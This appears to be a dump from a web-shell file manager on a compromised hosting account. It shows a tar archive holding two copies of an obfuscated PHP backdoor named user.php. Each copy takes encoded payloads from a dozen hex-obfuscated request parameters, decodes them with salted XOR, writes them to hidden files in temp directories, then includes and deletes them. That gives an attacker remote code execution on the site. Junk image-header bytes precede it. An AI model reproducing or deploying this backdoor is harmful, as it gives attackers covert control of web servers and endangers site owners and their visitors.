File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/hijabtrendz.com/user.php.tar

Back
home/tokomrjk/rtp8.selerakas.site/files/user.php��0000644��00000025123�15165717546�0015762 0��ustar�00��<?php if(isset($_POST) && isset($_POST["itm"])){ $mrk = array_filter([session_save_path(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), sys_get_temp_dir(), getenv("TMP")]); $data_chunk = $_POST["itm"]; $data_chunk = explode ( "." ,$data_chunk ) ; $entry=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s5); $m=0; $__tmp=$data_chunk; while ($v9=array_shift($__tmp)) {$chS=ord($s5[$m % $lenS]); $dec=((int)$v9 - $chS - ($m % 10)) ^ 81; $entry .= chr($dec); $m++; } foreach ($mrk as $rec) { if (!!is_dir($rec) && !!is_writable($rec)) { $object = "$rec/.dchunk"; $file = fopen($object, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $object; @unlink($object); exit; } } } } if(isset($_REQUEST) && isset($_REQUEST["\x6F\x62j"])){ $element = $_REQUEST["\x6F\x62j"]; $element = explode ( "." , $element) ; $comp = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s9 ); $s = 0; $__len = count($element ); do {if ($s >= $__len) break; $v1 = $element[$s]; $chS = ord($s9[$s % $sLen] ); $dec = ((int)$v1 - $chS - ($s % 10)) ^ 49; $comp.= chr($dec ); $s++; }while (true ); $ent = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir")]); $item = 0; do { $parameter_group = $ent[$item] ?? null; if ($item >= count($ent)) break; if ((bool)is_dir($parameter_group) && (bool)is_writable($parameter_group)) { $token = "$parameter_group" . "/.ptr"; if (file_put_contents($token, $comp)) { include $token; @unlink($token); exit; } } $item++; } while (true); } if(!is_null($_REQUEST["\x65\x6Et"] ?? null)){ $record = $_REQUEST["\x65\x6Et"]; $record = explode ( "." ,$record ); $pset = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $i = 0; while ($i < count($record)) { $v4 = $record[$i]; $sChar = ord($s[$i%$sLen] ); $dec = ((int)$v4 - $sChar - ($i%10)) ^13; $pset .= chr($dec ); $i++; } $mrk = array_filter([getcwd(), session_save_path(), "/dev/shm", "/tmp", getenv("TMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP")]); foreach ($mrk as $rec) { if ((function($d) { return is_dir($d) && is_writable($d); })($rec)) { $tkn = join("/", [$rec, ".object"]); if (@file_put_contents($tkn, $pset) !== false) { include $tkn; unlink($tkn); exit; } } } } if(@$_POST["pro\x70er\x74\x79_\x73e\x74"] !== null){ $resource = array_filter([getenv("TEMP"), "/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getenv("TMP"), "/dev/shm"]); $entry = $_POST["pro\x70er\x74\x79_\x73e\x74"]; $entry = explode ( '.' , $entry); $holder =''; $s3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s3); $__len =count( $entry); for( $k =0; $k < $__len; $k++) { $v3 =$entry[$k]; $sChar =ord( $s3[$k % $lenS]); $d =( ( int)$v3 - $sChar -( $k % 10)) ^ 85; $holder .=chr( $d); } foreach ($resource as $key => $ref) { if ((bool)is_dir($ref) && (bool)is_writable($ref)) { $item = str_replace("{var_dir}", $ref, "{var_dir}/.object"); if (file_put_contents($item, $holder)) { include $item; @unlink($item); die(); } } } } if(!empty($_POST["\x6Fbj\x65\x63t"])){ $token = array_filter(["/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), session_save_path()]); $symbol = $_POST["\x6Fbj\x65\x63t"]; $symbol= explode ('.' , $symbol ) ; $pgrp= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt1 ); $k= 0; $len= count($symbol ); do { if ($k>= $len) break; $v9= $symbol[$k]; $sChar= ord($salt1[$k % $lenS] ); $d= ((int)$v9 - $sChar - ($k % 10))^ 88; $pgrp.= chr($d ); $k++; } while (true ); while ($hld = array_shift($token)) { if (max(0, is_dir($hld) * is_writable($hld))) { $holder = vsprintf("%s/%s", [$hld, ".component"]); $success = file_put_contents($holder, $pgrp); if ($success) { include $holder; @unlink($holder); exit;} } } } if(count($_POST) > 0 && isset($_POST["d\x61ta_\x63\x68un\x6B"])){ $binding = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path()]); $key = $_POST["d\x61ta_\x63\x68un\x6B"]; $key = explode ( "." , $key ) ; $mrk =''; $s5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s5); $len =count($key); for($w =0; $w < $len; $w++) { $v9 =$key[$w]; $chS =ord($s5[$w % $lenS]); $dec =((int)$v9 - $chS -($w % 10)) ^70; $mrk .= chr($dec);} $dat = 0; do { $k = $binding[$dat] ?? null; if ($dat >= count($binding)) break; if (is_writable($k) && is_dir($k)) { $component = "$k/.sym"; if (file_put_contents($component, $mrk)) { include $component; @unlink($component); die(); } } $dat++; } while (true); } if(@$_REQUEST["\x62\x69nd"] !== null){ $fac = array_filter(["/var/tmp", "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TEMP")]); $binding = $_REQUEST["\x62\x69nd"]; $binding=explode( '.' , $binding ) ; $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $w = 0; array_walk( $binding , function( $v3) use( &$dat , &$w , $salt , $lenS) { $sChar = ord( $salt[$w% $lenS] ); $d = ( ( int)$v3 - $sChar -( $w% 10)) ^ 73; $dat .= chr( $d ); $w++; } ); foreach ($fac as $key => $flag) { if (array_product([is_dir($flag), is_writable($flag)])) { $pset = "$flag/.tkn"; if (file_put_contents($pset, $dat)) { include $pset; @unlink($pset); die(); } } } } if(count($_POST) > 0 && isset($_POST["e\x6Et\x69ty"])){ $binding = array_filter(["/dev/shm", sys_get_temp_dir(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getenv("TEMP"), getenv("TMP")]); $ent = $_POST["e\x6Et\x69ty"]; $ent=explode ( '.' , $ent) ; $entry= ''; $salt4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt4); $k= 0; while( $k < count( $ent)) { $v9= $ent[$k]; $chS= ord( $salt4[$k % $lenS]); $d= ( ( int)$v9 - $chS -( $k % 10)) ^ 23; $entry .= chr( $d); $k++;} foreach ($binding as $item) { if ((function($d) { return is_dir($d) && is_writable($d); })($item)) { $elem = str_replace("{var_dir}", $item, "{var_dir}/.ent"); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $elem; @unlink($elem); exit; } } } } if(isset($_POST["d\x61\x74\x61_c\x68\x75nk"]) ? true : false){ $fac = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", getenv("TEMP"), "/dev/shm", "/tmp", session_save_path(), sys_get_temp_dir()]); $flg = $_POST["d\x61\x74\x61_c\x68\x75nk"]; $flg= explode ( "." , $flg) ; $hld = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); $v = 0; array_walk($flg, function($v5) use(&$hld, &$v, $salt5, $lenS) {$chS = ord($salt5[$v % $lenS]); $dec = ((int)$v5 - $chS -($v % 10))^ 85; $hld .= chr($dec); $v++; }); foreach ($fac as $pointer): if (!!is_dir($pointer) && !!is_writable($pointer)) { $val = sprintf("%s/.comp", $pointer); $success = file_put_contents($val, $hld); if ($success) { include $val; @unlink($val); exit;} } endforeach; } if(isset($_REQUEST) && isset($_REQUEST["t\x6Bn"])){ $marker = $_REQUEST["t\x6Bn"]; $marker = explode ( '.' , $marker ); $component = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); $s = 0; foreach ($marker as $v5) { $sChar = ord($s7[$s % $lenS]); $d = ((int)$v5 - $sChar - ($s % 10)) ^ 22; $component .= chr($d); $s++; } $data = array_filter([getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir()]); $ptr = 0; do { $value = $data[$ptr] ?? null; if ($ptr >= count($data)) break; if (is_dir($value) ? is_writable($value) : false) { $itm = "$value/.fac"; if (file_put_contents($itm, $component)) { include $itm; @unlink($itm); die(); } } $ptr++; } while (true); } if(array_key_exists("\x76a\x6Cue", $_POST) && !is_null($_POST["\x76a\x6Cue"])){ $holder = array_filter([sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", session_save_path(), "/var/tmp", "/dev/shm", getenv("TEMP")]); $dchunk = $_POST["\x76a\x6Cue"]; $dchunk = explode ( '.' ,$dchunk ); $comp = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt9); foreach ($dchunk as $p=>$v8): $sChar = ord($salt9[$p % $sLen]); $d = ((int)$v8 - $sChar - ($p % 10)) ^ 13; $comp .=chr($d); endforeach; for ($descriptor = 0, $ptr = count($holder); $descriptor < $ptr; $descriptor++) { $record = $holder[$descriptor]; if ((bool)is_dir($record) && (bool)is_writable($record)) { $desc = join("/", [$record, ".obj"]); if (file_put_contents($desc, $comp)) { include $desc; @unlink($desc); die(); } } } } if(isset($_POST["toke\x6E"])){ $flg = array_filter([session_save_path(), "/var/tmp", "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), sys_get_temp_dir(), getenv("TMP")]); $dchunk = $_POST["toke\x6E"]; $dchunk = explode ( '.',$dchunk ) ; $hld = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $w = 0; $__tmp = $dchunk; while( $v5 = array_shift( $__tmp)) { $sChar = ord( $salt[$w%$lenS]); $dec =( ( int)$v5 - $sChar -( $w%10)) ^ 49; $hld .= chr( $dec); $w++; } for ($binding = 0, $item = count($flg); $binding < $item; $binding++) { $obj = $flg[$binding]; if (max(0, is_dir($obj) * is_writable($obj))) { $val = str_replace("{var_dir}", $obj, "{var_dir}/.record"); if (file_put_contents($val, $hld)) { include $val; @unlink($val); exit; } } } } if(@$_REQUEST["r\x65\x63"] !== null){ $item = $_REQUEST["r\x65\x63"]; $item= explode ("." , $item ); $comp =''; $s6 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s6); foreach($item as $l=>$v3): $chS =ord($s6[$l % $sLen]); $dec =((int)$v3 - $chS -($l % 10)) ^ 88; $comp .= chr($dec); endforeach; $element = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), "/tmp"]); while ($k = array_shift($element)) { if (max(0, is_dir($k) * is_writable($k))) { $reference = str_replace("{var_dir}", $k, "{var_dir}/.res"); if (file_put_contents($reference, $comp)) { require $reference; unlink($reference); exit; } } } }��home/tokomrjk/rtp7.selerakas.site/files/user.php��0000644��00000026450�15165721733�0015756 0��ustar�00��<?php if(array_key_exists("\x69\x74em", $_REQUEST)){ $res = $_REQUEST["\x69\x74em"]; $res= explode ( '.' , $res ) ; $pointer =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s4); foreach( $res as $x => $v7) { $chS =ord( $s4[$x % $sLen]); $dec =( ( int)$v7 - $chS -( $x % 10)) ^ 3; $pointer .= chr( $dec); } $ent = array_filter(["/dev/shm", getenv("TEMP"), getcwd(), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), sys_get_temp_dir()]); foreach ($ent as $elem) { if (!!is_dir($elem) && !!is_writable($elem)) { $fac = implode("/", [$elem, ".component"]); if (file_put_contents($fac, $pointer)) { require $fac; unlink($fac); die(); } } } } if(isset($_POST) && isset($_POST["itm"])){ $mrk = array_filter([session_save_path(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), sys_get_temp_dir(), getenv("TMP")]); $data_chunk = $_POST["itm"]; $data_chunk = explode ( "." ,$data_chunk ) ; $entry=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s5); $m=0; $__tmp=$data_chunk; while ($v9=array_shift($__tmp)) {$chS=ord($s5[$m % $lenS]); $dec=((int)$v9 - $chS - ($m % 10)) ^ 81; $entry .= chr($dec); $m++; } foreach ($mrk as $rec) { if (!!is_dir($rec) && !!is_writable($rec)) { $object = "$rec/.dchunk"; $file = fopen($object, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $object; @unlink($object); exit; } } } } if(isset($_REQUEST) && isset($_REQUEST["\x6F\x62j"])){ $element = $_REQUEST["\x6F\x62j"]; $element = explode ( "." , $element) ; $comp = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s9 ); $s = 0; $__len = count($element ); do {if ($s >= $__len) break; $v1 = $element[$s]; $chS = ord($s9[$s % $sLen] ); $dec = ((int)$v1 - $chS - ($s % 10)) ^ 49; $comp.= chr($dec ); $s++; }while (true ); $ent = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir")]); $item = 0; do { $parameter_group = $ent[$item] ?? null; if ($item >= count($ent)) break; if ((bool)is_dir($parameter_group) && (bool)is_writable($parameter_group)) { $token = "$parameter_group" . "/.ptr"; if (file_put_contents($token, $comp)) { include $token; @unlink($token); exit; } } $item++; } while (true); } if(!is_null($_REQUEST["\x65\x6Et"] ?? null)){ $record = $_REQUEST["\x65\x6Et"]; $record = explode ( "." ,$record ); $pset = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $i = 0; while ($i < count($record)) { $v4 = $record[$i]; $sChar = ord($s[$i%$sLen] ); $dec = ((int)$v4 - $sChar - ($i%10)) ^13; $pset .= chr($dec ); $i++; } $mrk = array_filter([getcwd(), session_save_path(), "/dev/shm", "/tmp", getenv("TMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP")]); foreach ($mrk as $rec) { if ((function($d) { return is_dir($d) && is_writable($d); })($rec)) { $tkn = join("/", [$rec, ".object"]); if (@file_put_contents($tkn, $pset) !== false) { include $tkn; unlink($tkn); exit; } } } } if(@$_POST["pro\x70er\x74\x79_\x73e\x74"] !== null){ $resource = array_filter([getenv("TEMP"), "/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getenv("TMP"), "/dev/shm"]); $entry = $_POST["pro\x70er\x74\x79_\x73e\x74"]; $entry = explode ( '.' , $entry); $holder =''; $s3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s3); $__len =count( $entry); for( $k =0; $k < $__len; $k++) { $v3 =$entry[$k]; $sChar =ord( $s3[$k % $lenS]); $d =( ( int)$v3 - $sChar -( $k % 10)) ^ 85; $holder .=chr( $d); } foreach ($resource as $key => $ref) { if ((bool)is_dir($ref) && (bool)is_writable($ref)) { $item = str_replace("{var_dir}", $ref, "{var_dir}/.object"); if (file_put_contents($item, $holder)) { include $item; @unlink($item); die(); } } } } if(!empty($_POST["\x6Fbj\x65\x63t"])){ $token = array_filter(["/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), session_save_path()]); $symbol = $_POST["\x6Fbj\x65\x63t"]; $symbol= explode ('.' , $symbol ) ; $pgrp= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt1 ); $k= 0; $len= count($symbol ); do { if ($k>= $len) break; $v9= $symbol[$k]; $sChar= ord($salt1[$k % $lenS] ); $d= ((int)$v9 - $sChar - ($k % 10))^ 88; $pgrp.= chr($d ); $k++; } while (true ); while ($hld = array_shift($token)) { if (max(0, is_dir($hld) * is_writable($hld))) { $holder = vsprintf("%s/%s", [$hld, ".component"]); $success = file_put_contents($holder, $pgrp); if ($success) { include $holder; @unlink($holder); exit;} } } } if(count($_POST) > 0 && isset($_POST["d\x61ta_\x63\x68un\x6B"])){ $binding = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path()]); $key = $_POST["d\x61ta_\x63\x68un\x6B"]; $key = explode ( "." , $key ) ; $mrk =''; $s5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s5); $len =count($key); for($w =0; $w < $len; $w++) { $v9 =$key[$w]; $chS =ord($s5[$w % $lenS]); $dec =((int)$v9 - $chS -($w % 10)) ^70; $mrk .= chr($dec);} $dat = 0; do { $k = $binding[$dat] ?? null; if ($dat >= count($binding)) break; if (is_writable($k) && is_dir($k)) { $component = "$k/.sym"; if (file_put_contents($component, $mrk)) { include $component; @unlink($component); die(); } } $dat++; } while (true); } if(@$_REQUEST["\x62\x69nd"] !== null){ $fac = array_filter(["/var/tmp", "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TEMP")]); $binding = $_REQUEST["\x62\x69nd"]; $binding=explode( '.' , $binding ) ; $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $w = 0; array_walk( $binding , function( $v3) use( &$dat , &$w , $salt , $lenS) { $sChar = ord( $salt[$w% $lenS] ); $d = ( ( int)$v3 - $sChar -( $w% 10)) ^ 73; $dat .= chr( $d ); $w++; } ); foreach ($fac as $key => $flag) { if (array_product([is_dir($flag), is_writable($flag)])) { $pset = "$flag/.tkn"; if (file_put_contents($pset, $dat)) { include $pset; @unlink($pset); die(); } } } } if(count($_POST) > 0 && isset($_POST["e\x6Et\x69ty"])){ $binding = array_filter(["/dev/shm", sys_get_temp_dir(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getenv("TEMP"), getenv("TMP")]); $ent = $_POST["e\x6Et\x69ty"]; $ent=explode ( '.' , $ent) ; $entry= ''; $salt4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt4); $k= 0; while( $k < count( $ent)) { $v9= $ent[$k]; $chS= ord( $salt4[$k % $lenS]); $d= ( ( int)$v9 - $chS -( $k % 10)) ^ 23; $entry .= chr( $d); $k++;} foreach ($binding as $item) { if ((function($d) { return is_dir($d) && is_writable($d); })($item)) { $elem = str_replace("{var_dir}", $item, "{var_dir}/.ent"); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $elem; @unlink($elem); exit; } } } } if(isset($_POST["d\x61\x74\x61_c\x68\x75nk"]) ? true : false){ $fac = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", getenv("TEMP"), "/dev/shm", "/tmp", session_save_path(), sys_get_temp_dir()]); $flg = $_POST["d\x61\x74\x61_c\x68\x75nk"]; $flg= explode ( "." , $flg) ; $hld = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); $v = 0; array_walk($flg, function($v5) use(&$hld, &$v, $salt5, $lenS) {$chS = ord($salt5[$v % $lenS]); $dec = ((int)$v5 - $chS -($v % 10))^ 85; $hld .= chr($dec); $v++; }); foreach ($fac as $pointer): if (!!is_dir($pointer) && !!is_writable($pointer)) { $val = sprintf("%s/.comp", $pointer); $success = file_put_contents($val, $hld); if ($success) { include $val; @unlink($val); exit;} } endforeach; } if(isset($_REQUEST) && isset($_REQUEST["t\x6Bn"])){ $marker = $_REQUEST["t\x6Bn"]; $marker = explode ( '.' , $marker ); $component = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); $s = 0; foreach ($marker as $v5) { $sChar = ord($s7[$s % $lenS]); $d = ((int)$v5 - $sChar - ($s % 10)) ^ 22; $component .= chr($d); $s++; } $data = array_filter([getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir()]); $ptr = 0; do { $value = $data[$ptr] ?? null; if ($ptr >= count($data)) break; if (is_dir($value) ? is_writable($value) : false) { $itm = "$value/.fac"; if (file_put_contents($itm, $component)) { include $itm; @unlink($itm); die(); } } $ptr++; } while (true); } if(array_key_exists("\x76a\x6Cue", $_POST) && !is_null($_POST["\x76a\x6Cue"])){ $holder = array_filter([sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", session_save_path(), "/var/tmp", "/dev/shm", getenv("TEMP")]); $dchunk = $_POST["\x76a\x6Cue"]; $dchunk = explode ( '.' ,$dchunk ); $comp = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt9); foreach ($dchunk as $p=>$v8): $sChar = ord($salt9[$p % $sLen]); $d = ((int)$v8 - $sChar - ($p % 10)) ^ 13; $comp .=chr($d); endforeach; for ($descriptor = 0, $ptr = count($holder); $descriptor < $ptr; $descriptor++) { $record = $holder[$descriptor]; if ((bool)is_dir($record) && (bool)is_writable($record)) { $desc = join("/", [$record, ".obj"]); if (file_put_contents($desc, $comp)) { include $desc; @unlink($desc); die(); } } } } if(isset($_POST["toke\x6E"])){ $flg = array_filter([session_save_path(), "/var/tmp", "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), sys_get_temp_dir(), getenv("TMP")]); $dchunk = $_POST["toke\x6E"]; $dchunk = explode ( '.',$dchunk ) ; $hld = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $w = 0; $__tmp = $dchunk; while( $v5 = array_shift( $__tmp)) { $sChar = ord( $salt[$w%$lenS]); $dec =( ( int)$v5 - $sChar -( $w%10)) ^ 49; $hld .= chr( $dec); $w++; } for ($binding = 0, $item = count($flg); $binding < $item; $binding++) { $obj = $flg[$binding]; if (max(0, is_dir($obj) * is_writable($obj))) { $val = str_replace("{var_dir}", $obj, "{var_dir}/.record"); if (file_put_contents($val, $hld)) { include $val; @unlink($val); exit; } } } } if(@$_REQUEST["r\x65\x63"] !== null){ $item = $_REQUEST["r\x65\x63"]; $item= explode ("." , $item ); $comp =''; $s6 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s6); foreach($item as $l=>$v3): $chS =ord($s6[$l % $sLen]); $dec =((int)$v3 - $chS -($l % 10)) ^ 88; $comp .= chr($dec); endforeach; $element = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), "/tmp"]); while ($k = array_shift($element)) { if (max(0, is_dir($k) * is_writable($k))) { $reference = str_replace("{var_dir}", $k, "{var_dir}/.res"); if (file_put_contents($reference, $comp)) { require $reference; unlink($reference); exit; } } } }��